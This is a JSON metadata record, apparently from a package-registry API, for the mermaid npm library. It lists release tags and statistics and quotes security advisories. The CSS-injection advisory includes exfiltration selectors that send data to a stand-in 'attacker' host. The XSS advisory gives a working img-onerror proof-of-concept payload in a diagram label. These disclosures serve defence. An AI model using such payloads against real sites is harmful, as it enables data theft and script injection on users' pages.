ttps://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.1/manifests"},{"name":"0.3.0","sha":"c50178c640a4f6c99539bcc64cf029e94263fdb4","kind":"commit","published_at":"2014-12-22T12:52:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.3.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.0/manifests"},{"name":"0.2.16","sha":"5712c6de7bdca29a2950df1e6e0342ca8f0323a4","kind":"commit","published_at":"2014-12-15T18:35:09.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.16","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.16","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.16/manifests"},{"name":"0.2.15","sha":"6988dea3535919faa599537c31c5d94a01a30479","kind":"commit","published_at":"2014-12-05T09:50:47.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.15","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.15","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.15/manifests"},{"name":"0.2.14","sha":"dd26960852b4cba1d60e6bb2e508c0af6dd3d4b4","kind":"commit","published_at":"2014-12-03T18:35:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.14","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.14","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.14/manifests"},{"name":"0.2.13","sha":"fe2f3b403d1310c2a6e09aac24d0fdd257c2ddcf","kind":"commit","published_at":"2014-12-03T18:29:44.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.13","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.13","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.13/manifests"},{"name":"0.2.10","sha":"15023461722117d1429bbc0eb6030ca35aa51d53","kind":"commit","published_at":"2014-12-01T20:12:14.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.10","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.10/manifests"},{"name":"0.2.9","sha":"1a7997cdef01882ea7b46948d58625e904a09094","kind":"tag","published_at":"2014-12-01T20:04:35.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.9","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.9/manifests"},{"name":"0.2.8","sha":"1d2327c4c2ae60692f9bfe8b4d19ea195ebcbb04","kind":"tag","published_at":"2014-12-01T09:01:06.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.8","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.8/manifests"},{"name":"0.2.7","sha":"cbd41dbb1b4875aa3254babca694844908a1ecf7","kind":"tag","published_at":"2014-12-01T08:30:27.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.7","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.7/manifests"},{"name":"0.2.6","sha":"9a35844731426e1f74f64d272ae6398f20424457","kind":"commit","published_at":"2014-11-27T20:28:04.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.6","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.6/manifests"},{"name":"0.2.5","sha":"18be0e02aa80dcad171b26d2e397750100dc7d23","kind":"commit","published_at":"2014-11-27T20:16:17.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.5/manifests"},{"name":"0.2.4","sha":"9c31ac8aa68bff142e33b63b5ca3217aa8db7f5a","kind":"commit","published_at":"2014-11-25T21:58:57.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.4/manifests"},{"name":"0.2.3","sha":"d18103a0ec61801ac437a46cecaec81628037bb2","kind":"commit","published_at":"2014-11-24T21:03:32.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.3/manifests"},{"name":"0.2.2","sha":"cb58aeab2532be6d8bc1eab6503ca752fcf85965","kind":"commit","published_at":"2014-11-22T18:06:04.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.2/manifests"},{"name":"0.2.1","sha":"c0a4cfc2d768a7fe0a5d442635b7590054577eeb","kind":"commit","published_at":"2014-11-22T17:36:02.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.1/manifests"},{"name":"0.2.0","sha":"83de219552e39f8ed19a2300f215e1159abcfb33","kind":"commit","published_at":"2014-11-22T16:29:05.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.0/manifests"},{"name":"0.1.1","sha":"64bedc8262b6e116c344de10968e78a06323d304","kind":"commit","published_at":"2014-11-17T06:50:42.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.1.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.1.1/manifests"},{"name":"0.1.0","sha":"46b45a820976091d3dcf1d99c6a4e8a35e7d9ade","kind":"tag","published_at":"2014-11-16T19:32:58.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.1.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.1.0/manifests"}]},"repo_metadata_updated_at":"2024-09-06T20:40:49.880Z","dependent_packages_count":554,"downloads":5839200,"downloads_period":"last-month","dependent_repos_count":13441,"rankings":{"downloads":0.18638355394904793,"dependent_repos_count":0.2338499934922741,"dependent_packages_count":0.12027875901091699,"stargazers_count":0.0879970132963116,"forks_count":0.48645251300974335,"docker_downloads_count":0.0967596091710984,"average":0.20195357365489874},"purl":"pkg:npm/mermaid","advisories":[{"uuid":"GSA_kwCzR0hTQS1tNGdxLXgyNGotanBtZs4ABAkl","url":"https://github.com/advisories/GHSA-m4gq-x24j-jpmf","title":"Prototype pollution vulnerability found in Mermaid's bundled version of DOMPurify","description":"The following bundled files within the Mermaid NPM package contain a bundled version of DOMPurify that is vulnerable to https://github.com/cure53/DOMPurify/security/advisories/GHSA-mmhx-hmjr-r674, potentially resulting in an XSS attack.\n\nThis affects the built:\n\n- `dist/mermaid.min.js`\n- `dist/mermaid.js`\n- `dist/mermaid.esm.mjs`\n- `dist/mermaid.esm.min.mjs`\n\nThis will also affect users that use the above files via a CDN link, e.g. `https://cdn.jsdelivr.net/npm/mermaid@10.9.2/dist/mermaid.min.js`\n\n**Users that use the default NPM export of `mermaid`, e.g. `import mermaid from 'mermaid'`, or the `dist/mermaid.core.mjs` file, do not use this bundled version of DOMPurify, and can easily update using their package manager with something like `npm audit fix`.**\n\n### Patches\n\n- `develop` branch: 6c785c93166c151d27d328ddf68a13d9d65adc00\n- backport to v10: 92a07ffe40aab2769dd1c3431b4eb5beac282b34","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2024-10-22T18:17:02.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":0.0,"cvss_vector":null,"references":["https://github.com/cure53/DOMPurify/security/advisories/GHSA-mmhx-hmjr-r674","https://github.com/mermaid-js/mermaid/security/advisories/GHSA-m4gq-x24j-jpmf","https://github.com/mermaid-js/mermaid/commit/6c785c93166c151d27d328ddf68a13d9d65adc00","https://github.com/mermaid-js/mermaid/commit/92a07ffe40aab2769dd1c3431b4eb5beac282b34","https://github.com/advisories/GHSA-m4gq-x24j-jpmf"],"source_kind":"github","identifiers":["GHSA-m4gq-x24j-jpmf"],"repository_url":"https://github.com/cure53/DOMPurify","blast_radius":0.0,"created_at":"2024-10-22T19:07:28.852Z","updated_at":"2024-10-23T16:58:48.000Z","epss_percentage":null,"epss_percentile":null,"packages":[{"ecosystem":"npm","package_name":"mermaid","versions":[{"first_patched_version":"10.9.3","vulnerable_version_range":"\u003c= 10.9.2"}],"purl":"pkg:npm/mermaid","statistics":{"dependent_packages_count":554,"dependent_repos_count":13441,"downloads":5839200,"downloads_period":"last-month"},"affected_versions":["0.2.11","0.2.12","0.2.13","0.2.14","0.2.15","0.2.16","0.3.0","0.3.2","0.3.3","0.3.4","0.3.5","0.4.0","0.5.0","0.5.1","0.5.2","0.5.3","0.5.4","0.5.5","0.5.6","0.5.7","0.5.8","6.0.0","7.0.0","7.0.1","7.0.2","7.0.3","7.0.4","7.0.5","7.0.6","7.0.7","7.0.8","7.0.9","7.0.10","7.0.11","7.0.12","7.0.13","7.0.14","7.0.15","7.0.16","7.0.17","7.0.18","7.1.0","7.1.1","7.1.2","8.0.0","8.1.0","8.2.1","8.2.2","8.2.3","8.2.4","8.2.5","8.2.6","8.3.0","8.3.1","8.4.0","8.4.1","8.4.2","8.4.3","8.4.4","8.4.5","8.4.6","8.4.7","8.4.8","8.5.0","8.5.1","8.5.2","8.6.0","8.6.1","8.6.2","8.6.3","8.6.4","8.7.0","8.8.0","8.8.1","8.8.2","8.8.3","8.8.4","8.9.0","8.9.1","8.9.2","8.9.3","8.10.1","8.10.2","8.11.0","8.11.1","8.11.2","8.11.3","8.11.4","8.11.5","8.12.0","8.12.1","8.13.0","8.13.1","8.13.2","8.13.3","8.13.4","8.13.5","8.13.6","8.13.7","8.13.8","8.13.9","8.13.10","8.14.0","9.0.0","9.0.1","9.1.0","9.1.1","9.1.2","9.1.3","9.1.4","9.1.5","9.1.6","9.1.7","9.2.0","9.2.1","9.2.2","9.3.0","9.4.0","9.4.2","9.4.3","10.0.0","10.0.1","10.0.2","10.1.0","10.2.0","10.2.1","10.2.2","10.2.3","10.2.4","10.3.0","10.3.1","10.4.0","10.5.0","10.5.1","10.6.0","10.6.1","10.7.0","10.8.0","10.9.0","10.9.1","10.9.2"],"unaffected_versions":["10.9.3","11.0.0","11.0.1","11.0.2","11.1.0","11.1.1","11.2.0","11.2.1","11.3.0","11.4.0","11.4.1","11.5.0","11.6.0","11.7.0","11.8.0","11.8.1","11.9.0","11.10.0"]}]},{"uuid":"GSA_kwCzR0hTQS14M3ZtLTM4aHctNTV3Zs4AAtGz","url":"https://github.com/advisories/GHSA-x3vm-38hw-55wf","title":"Possible inject arbitrary `CSS` into the generated graph affecting the container HTML","description":"An attacker is able to inject arbitrary `CSS` into the generated graph allowing them to change the styling of elements outside of the generated graph, and potentially exfiltrate sensitive information by using specially crafted `CSS` selectors.\n\nThe following example shows how an attacker can exfiltrate the contents of an input field by bruteforcing the `value` attribute one character at a time. Whenever there is an actual match, an `http` request will be made by the browser in order to \"load\" a background image that will let an attacker know what's the value of the character.\n\n```css\ninput[name=secret][value^=g] { background-image: url(http://attacker/?char=g); }\n...\ninput[name=secret][value^=go] { background-image: url(http://attacker/?char=o); }\n...\ninput[name=secret][value^=goo] { background-image: url(http://attacker/?char=o); }\n...\ninput[name=secret][value^=goos] { background-image: url(http://attacker/?char=s); }\n...\ninput[name=secret][value^=goose] { background-image: url(http://attacker/?char=e); }\n```\n\n### Patches\n_Has the problem been patched? What versions should users upgrade to?_\n\n### Workarounds\n_Is there a way for users to fix or remediate the vulnerability without upgrading?_\n\n### References\n_Are there any links users can visit to find out more?_\n\n### For more information\nIf you have any questions or comments about this advisory:\n* Open an issue in [example link to repo](http://example.com)\n* Email us at [example email address](mailto:example@example.com)\n## Product\n\nmermaid.js\n\n## Tested Version\n\n[v9.1.1](https://github.com/mermaid-js/mermaid/releases/tag/9.1.1)\n\n## Details\n\n### Issue 1: Multiple CSS Injection (`GHSL-2022-036`)\n\nBy supplying a carefully crafted `textColor` theme variable, an attacker can inject arbitrary `CSS` rules into the document. In the following snippet we can see that `getStyles` does not sanitize any of the theme variables leaving the door open for `CSS` injection.\n\n_Snippet from [src/styles.js](https://github.com/mermaid-js/mermaid/blob/9eae97ddab1b6eca58d2fd4af62357d2f4d8d1f7/src/styles.js#L35):_\n\n```js\nconst getStyles = (type, userStyles, options) =\u003e {\n  return ` {\n    font-family: ${options.fontFamily};\n    font-size: ${options.fontSize};\n    fill: ${options.textColor}\n  }\n```\n\nFor example, if we set `textColor` to `\"green;} #target { background-color: crimson }\"` the resulting `CSS` will contain a new selector `#target` that will apply a `crimson` background color to an arbitrary element.\n\n```html\n\u003chtml\u003e\n\n\u003cbody\u003e\n    \u003cdiv id=\"target\"\u003e\n        \u003ch1\u003eThis element does not belong to the SVG but we can style it\u003c/h1\u003e\n    \u003c/div\u003e\n    \u003csvg id=\"diagram\"\u003e\n    \u003c/svg\u003e\n\n    \u003cscript src=\"https://cdn.jsdelivr.net/npm/mermaid/dist/mermaid.min.js\"\u003e\u003c/script\u003e\n    \u003cscript\u003e\n        mermaid.initialize({ startOnLoad: false });\n\n        const graph =\n            `\n            %%{ init: { \"themeVariables\" : { \"textColor\": \"green;} #target { background-color: crimson }\" } } }%%\n            graph TD\n                A[Goose]\n            `\n\n        const diagram = document.getElementById(\"diagram\")\n        const svg = mermaid.render('diagram-svg', graph)\n        diagram.innerHTML = svg\n    \u003c/script\u003e\n\u003c/body\u003e\n\n\u003c/html\u003e\n```\n\nIn the proof of concept above we used the `textColor` variable to inject `CSS`, but there are multiple functions that can potentially be abused to change the style of the document. Some of them are in the following list but we encourage mantainers to look for additional injection points:\n\n- https://github.com/mermaid-js/mermaid/blob/5d30d465354f804e361d7a041ec46da6bb5d583b/src/mermaidAPI.js#L393\n- https://github.com/mermaid-js/mermaid/blob/5d30d465354f804e361d7a041ec46da6bb5d583b/src/styles.js#L35\n\n#### Impact\n\nThis issue may lead to `Information Disclosure` via CSS selectors and functions able to generate HTTP requests. This also allows an attacker to change the document in ways which may lead a user to perform unintended actions, such as clicking on a link, etc.\n\n#### Remediation\n\nEnsure that user input is adequately escaped before embedding it in CSS blocks.","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2022-07-05T18:29:31.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":0.0,"cvss_vector":null,"references":["https://github.com/mermaid-js/mermaid/security/advisories/GHSA-x3vm-38hw-55wf","https://nvd.nist.gov/vuln/detail/CVE-2022-31108","https://github.com/mermaid-js/mermaid/commit/0ae1bdb61adff1cd485caff8c62ec6b8ac57b225","https://github.com/advisories/GHSA-x3vm-38hw-55wf"],"source_kind":"github","identifiers":["GHSA-x3vm-38hw-55wf","CVE-2022-31108"],"repository_url":"https://github.com/mermaid-js/mermaid","blast_radius":0.0,"created_at":"2022-12-21T16:12:14.228Z","updated_at":"2023-07-21T19:28:57.000Z","epss_percentage":0.00305,"epss_percentile":0.53347,"packages":[{"ecosystem":"npm","package_name":"mermaid","versions":[{"first_patched_version":"9.1.2","vulnerable_version_range":"\u003e= 8.0.0, \u003c 9.1.2"}],"purl":"pkg:npm/mermaid","statistics":{"dependent_packages_count":554,"dependent_repos_count":13441,"downloads":5839200,"downloads_period":"last-month"},"affected_versions":["8.0.0","8.1.0","8.2.1","8.2.2","8.2.3","8.2.4","8.2.5","8.2.6","8.3.0","8.3.1","8.4.0","8.4.1","8.4.2","8.4.3","8.4.4","8.4.5","8.4.6","8.4.7","8.4.8","8.5.0","8.5.1","8.5.2","8.6.0","8.6.1","8.6.2","8.6.3","8.6.4","8.7.0","8.8.0","8.8.1","8.8.2","8.8.3","8.8.4","8.9.0","8.9.1","8.9.2","8.9.3","8.10.1","8.10.2","8.11.0","8.11.1","8.11.2","8.11.3","8.11.4","8.11.5","8.12.0","8.12.1","8.13.0","8.13.1","8.13.2","8.13.3","8.13.4","8.13.5","8.13.6","8.13.7","8.13.8","8.13.9","8.13.10","8.14.0","9.0.0","9.0.1","9.1.0","9.1.1"],"unaffected_versions":["0.2.11","0.2.12","0.2.13","0.2.14","0.2.15","0.2.16","0.3.0","0.3.2","0.3.3","0.3.4","0.3.5","0.4.0","0.5.0","0.5.1","0.5.2","0.5.3","0.5.4","0.5.5","0.5.6","0.5.7","0.5.8","6.0.0","7.0.0","7.0.1","7.0.2","7.0.3","7.0.4","7.0.5","7.0.6","7.0.7","7.0.8","7.0.9","7.0.10","7.0.11","7.0.12","7.0.13","7.0.14","7.0.15","7.0.16","7.0.17","7.0.18","7.1.0","7.1.1","7.1.2","9.1.2","9.1.3","9.1.4","9.1.5","9.1.6","9.1.7","9.2.0","9.2.1","9.2.2","9.3.0","9.4.0","9.4.2","9.4.3","10.0.0","10.0.1","10.0.2","10.1.0","10.2.0","10.2.1","10.2.2","10.2.3","10.2.4","10.3.0","10.3.1","10.4.0","10.5.0","10.5.1","10.6.0","10.6.1","10.7.0","10.8.0","10.9.0","10.9.1","10.9.2","10.9.3","11.0.0","11.0.1","11.0.2","11.1.0","11.1.1","11.2.0","11.2.1","11.3.0","11.4.0","11.4.1","11.5.0","11.6.0","11.7.0","11.8.0","11.8.1","11.9.0","11.10.0"]}]},{"uuid":"GSA_kwCzR0hTQS03cnFxLXBydnAteDlqaM4ABLOC","url":"https://github.com/advisories/GHSA-7rqq-prvp-x9jh","title":"Mermaid improperly sanitizes sequence diagram labels leading to XSS","description":"### Summary\nIn the default configuration of mermaid 11.9.0, user supplied input for sequence diagram labels is passed to `innerHTML` during calculation of element size, causing XSS.\n\n### Details\nSequence diagram node labels with KaTeX delimiters are passed through `calculateMathMLDimensions`. This method passes the full label to `innerHTML` which allows allows malicious users to inject arbitrary HTML and cause XSS when mermaid-js is used in it's default configuration (with KaTeX support enabled). \n\nThe vulnerability lies here:\n\n```ts\nexport const calculateMathMLDimensions = async (text: string, config: MermaidConfig) =\u003e {\n  text = await renderKatex(text, config);\n  const divElem = document.createElement('div');\n  divElem.innerHTML = text; // XSS sink, text has not been sanitized.\n  divElem.id = 'katex-temp';\n  divElem.style.visibility = 'hidden';\n  divElem.style.position = 'absolute';\n  divElem.style.top = '0';\n  const body = document.querySelector('body');\n  body?.insertAdjacentElement('beforeend', divElem);\n  const dim = { width: divElem.clientWidth, height: divElem.clientHeight };\n  divElem.remove();\n  return dim;\n};\n```\n\nThe `calculateMathMLDimensions` method was introduced in 5c69e5fdb004a6d0a2abe97e23d26e223a059832 two years ago, which was released in [Mermaid 10.9.0](https://github.com/mermaid-js/mermaid/releases/tag/v10.9.0).\n\n### PoC\nRender the following diagram and observe the modified DOM.\n\n```\nsequenceDiagram\n    participant A as Alice\u003cimg src=\"x\" onerror=\"document.write(`xss on ${document.domain}`)\"\u003e$$\\\\text{Alice}$$\n    A-\u003e\u003eJohn: Hello John, how are you?\n    Alice-)John: See you later!\n```\n\nHere is a PoC on mermaid.live: https://mermaid.live/edit#pako:eNpVUMtOwzAQ_BWzyoFKaRTyaFILiio4IK7ckA-1km1iKbaLY6spUf4dJ0AF68uOZ2dm7REqXSNQ6PHDoarwWfDGcMkUudaJGysqceLKkj3hPdl3osJ7IRvSm-qBwcCAaIXGaONRrSsnUdnobITF28PQ954lwXglai25UNNhxWAXBMyXxcGOi-3kL_5k79e73atuFSUv2HWazH1IWn0m3CC5aPf4b3p2WK--BW-4DJCOWzQ3TM0HQmiMqIFa4zAEicZv4iGMsw0D26JEBtS3NR656ywDpiYv869_11r-Ko12TQv0yLveI3eqfcjP111HUNVonrRTFuhdsVgAHWEAmuRxlG7SuEzKMi-yJAnhAjTLIk_EcbFJtuk2y9MphM8lM47KIp--AOZghtU\n\n### Impact\nXSS on all sites that use mermaid and render user supplied diagrams without further sanitization.\n\n### Remediation\nThe value of the `text` argument for the `calculateMathMLDimensions` method needs to be sanitized before getting passed on to `innerHTML`.","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2025-08-19T20:16:58.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":5.3,"cvss_vector":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N","references":["https://github.com/mermaid-js/mermaid/security/advisories/GHSA-7rqq-prvp-x9jh","https://nvd.nist.gov/vuln/detail/CVE-2025-54881","https://github.com/mermaid-js/mermaid/commit/5c69e5fdb004a6d0a2abe97e23d26e223a059832","https://github.com/mermaid-js/mermaid/commit/685516a85ec1df64cefd4fd15f26533be87d458e","https://github.com/advisories/GHSA-7rqq-prvp-x9jh"],"source_kind":"github","identifiers":["GHSA-7rqq-prvp-x9jh","CVE-2025-54881"],"repository_url":"https://github.com/mermaid-js/mermaid","blast_radius":21.880687379794207,"created_at":"2025-08-19T21:09:52.128Z","updated_at":"2025-09-04T12:53:43.000Z","epss_percentage":0.00059,"epss_percentile":0.18284,"packages":[{"ecosystem":"npm","package_name":"mermaid","versions":[{"first_patched_version":"10.9.4","vulnerable_version_range":"\u003e= 10.9.0-rc.1, \u003c 10.9.4"},{"first_patched_version":"11.10.0","vulnerable_version_range":"\u003e= 11.0.0-alpha.1, \u003c 11.10.0"}],"purl":"pkg:npm/mermaid","statistics":{"dependent_packages_count":554,"dependent_repos_count":13441,"downloads":5839200,"downloads_period":"last-month"},"affected_versions":["10.9.0","10.9.0-rc.1","10.9.0-rc.2","10.9.1","10.9.2","10.9.3","11.0.0","11.0.0-alpha.1","11.0.0-alpha.2","11.0.0-alpha.3","11.0.0-alpha.4","11.0.0-alpha.5","11.0.0-alpha.6","11.0.0-alpha.7","11.0.1","11.0.2","11.1.0","11.1.1","11.2.0","11.2.1","11.3.0","11.4.0","11.4.1","11.5.0","11.6.0","11.7.0","11.8.0","11.8.1","11.9.0"],"unaffected_versions":["0.2.11","0.2.12","0.2.13","0.2.14","0.2.15","0.2.16","0.3.0","0.3.2","0.3.3","0.3.4","0.3.5","0.4.0","0.5.0","0.5.1","0.5.2","0.5.3","0.5.4","0.5.5","0.5.6","0.5.7","0.5.8","6.0.0","7.0.0","7.0.1","7.0.2","7.0.3","7.0.4","7.0.5","7.0.6","7.0.7","7.0.8","7.0.9","7.0.10","7.0.11","7.0.12","7.0.13","7.0.14","7.0.15","7.0.16","7.0.17","7.0.18","7.1.0","7.1.1","7.1.2","8.0.0","8.1.0","8.2.1","8.2.2","8.2.3","8.2.4","8.2.5","8.2.6","8.3.0","8.3.1","8.4.0","8.4.1","8.4.2","8.4.3","8.4.4","8.4.5","8.4.6","8.4.7","8.4.8","8.5.0","8.5.1","8.5.2","8.6.0","8.6.1","8.6.2","8.6.3","8.6.4","8.7.0","8.8.0","8.8.1","8.8.2","8.8.3","8.8.4","8.9.0","8.9.1","8.9.2","8.9.3","8.10.1","8.10.2","8.11.0","8.11.1","8.11.2","8.11.3","8.11.4","8.11.5","8.12.0","8.12.1","8.13.0","8.13.1","8.13.2","8.13.3","8.13.4","8.13.5","8.13.6","8.13.7","8.13.8","8.13.9","8.13.10","8.14.0","9.0.0","9.0.1","9.1.0","9.1.1","9.1.2","9.1.3","9.1.4","9.1.5","9.1.6","9.1.7","9.2.0","9.2.1","9.2.2","9.3.0","9.4.0","9.4.2","9.4.3","10.0.0","10.0.1","10.0.2","10.1.0","10.2.0","10.2.1","10.2.2","10.2.3","10.2.4","10.3.0","10.3.1","10.4.0","10.5.0","10.5.1","10.6.0","10.6.1","10.7.0","10.8.0","11.10.0"]}]},{"uuid":"GSA_kwCzR0hTQS04Z3dtLTU4Zzktajhwd84ABLOB","url":"https://github.com/advisories/GHSA-8gwm-58g9-j8pw","title":"Mermaid does not properly sanitize architecture diagram iconText leading to XSS","description":"### Summary\nIn the default configuration of mermaid 11.9.0, user supplied input for architecture diagram icons is passed to the d3 `html()` method, creating a sink for cross site scripting.\n\n### Details\nArchitecture diagram service `iconText` values are passed to the d3 `html()` method, allowing malicious users to inject arbitrary HTML and cause XSS when mermaid-js is used in it's default configuration. \n\nThe vulnerability lies here:\n\n```ts\nexport const drawServices = async function (\n  db: ArchitectureDB,\n  elem: D3Element,\n  services: ArchitectureService[]\n): Promise\u003cnumber\u003e {\n  for (const service of services) {\n    /** ... **/\n    } else if (service.iconText) {\n      bkgElem.html(\n        `\u003cg\u003e${await getIconSVG('blank', { height: iconSize, width: iconSize, fallbackPrefix: architectureIcons.prefix })}\u003c/g\u003e`\n      );\n      const textElemContainer = bkgElem.append('g');\n      const fo = textElemContainer\n        .append('foreignObject')\n        .attr('width', iconSize)\n        .attr('height', iconSize);\n      const divElem = fo\n        .append('div')\n        .attr('class', 'node-icon-text')\n        .attr('style', `height: ${iconSize}px;`)\n        